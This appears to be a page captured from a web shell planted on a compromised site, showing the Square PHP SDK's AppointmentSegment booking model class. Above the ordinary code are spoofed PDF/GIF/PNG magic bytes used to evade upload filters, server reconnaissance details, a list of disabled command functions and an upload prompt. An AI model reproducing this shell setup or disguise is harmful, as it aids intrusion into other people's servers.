%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/public_html/admin1/vendor/square/square/src/Models/ |
Upload File : |
<?php
declare(strict_types=1);
namespace Square\Models;
use stdClass;
/**
* Defines an appointment segment of a booking.
*/
class AppointmentSegment implements \JsonSerializable
{
/**
* @var int
*/
private $durationMinutes;
/**
* @var string
*/
private $serviceVariationId;
/**
* @var string
*/
private $teamMemberId;
/**
* @var int
*/
private $serviceVariationVersion;
/**
* @param int $durationMinutes
* @param string $serviceVariationId
* @param string $teamMemberId
* @param int $serviceVariationVersion
*/
public function __construct(
int $durationMinutes,
string $serviceVariationId,
string $teamMemberId,
int $serviceVariationVersion
) {
$this->durationMinutes = $durationMinutes;
$this->serviceVariationId = $serviceVariationId;
$this->teamMemberId = $teamMemberId;
$this->serviceVariationVersion = $serviceVariationVersion;
}
/**
* Returns Duration Minutes.
*
* The time span in minutes of an appointment segment.
*/
public function getDurationMinutes(): int
{
return $this->durationMinutes;
}
/**
* Sets Duration Minutes.
*
* The time span in minutes of an appointment segment.
*
* @required
* @maps duration_minutes
*/
public function setDurationMinutes(int $durationMinutes): void
{
$this->durationMinutes = $durationMinutes;
}
/**
* Returns Service Variation Id.
*
* The ID of the [CatalogItemVariation]($m/CatalogItemVariation) object representing the service booked
* in this segment.
*/
public function getServiceVariationId(): string
{
return $this->serviceVariationId;
}
/**
* Sets Service Variation Id.
*
* The ID of the [CatalogItemVariation]($m/CatalogItemVariation) object representing the service booked
* in this segment.
*
* @required
* @maps service_variation_id
*/
public function setServiceVariationId(string $serviceVariationId): void
{
$this->serviceVariationId = $serviceVariationId;
}
/**
* Returns Team Member Id.
*
* The ID of the [TeamMember]($m/TeamMember) object representing the team member booked in this segment.
*/
public function getTeamMemberId(): string
{
return $this->teamMemberId;
}
/**
* Sets Team Member Id.
*
* The ID of the [TeamMember]($m/TeamMember) object representing the team member booked in this segment.
*
* @required
* @maps team_member_id
*/
public function setTeamMemberId(string $teamMemberId): void
{
$this->teamMemberId = $teamMemberId;
}
/**
* Returns Service Variation Version.
*
* The current version of the item variation representing the service booked in this segment.
*/
public function getServiceVariationVersion(): int
{
return $this->serviceVariationVersion;
}
/**
* Sets Service Variation Version.
*
* The current version of the item variation representing the service booked in this segment.
*
* @required
* @maps service_variation_version
*/
public function setServiceVariationVersion(int $serviceVariationVersion): void
{
$this->serviceVariationVersion = $serviceVariationVersion;
}
/**
* Encode this object to JSON
*
* @param bool $asArrayWhenEmpty Whether to serialize this model as an array whenever no fields
* are set. (default: false)
*
* @return mixed
*/
public function jsonSerialize(bool $asArrayWhenEmpty = false)
{
$json = [];
$json['duration_minutes'] = $this->durationMinutes;
$json['service_variation_id'] = $this->serviceVariationId;
$json['team_member_id'] = $this->teamMemberId;
$json['service_variation_version'] = $this->serviceVariationVersion;
$json = array_filter($json, function ($val) {
return $val !== null;
});
return (!$asArrayWhenEmpty && empty($json)) ? new stdClass() : $json;
}
}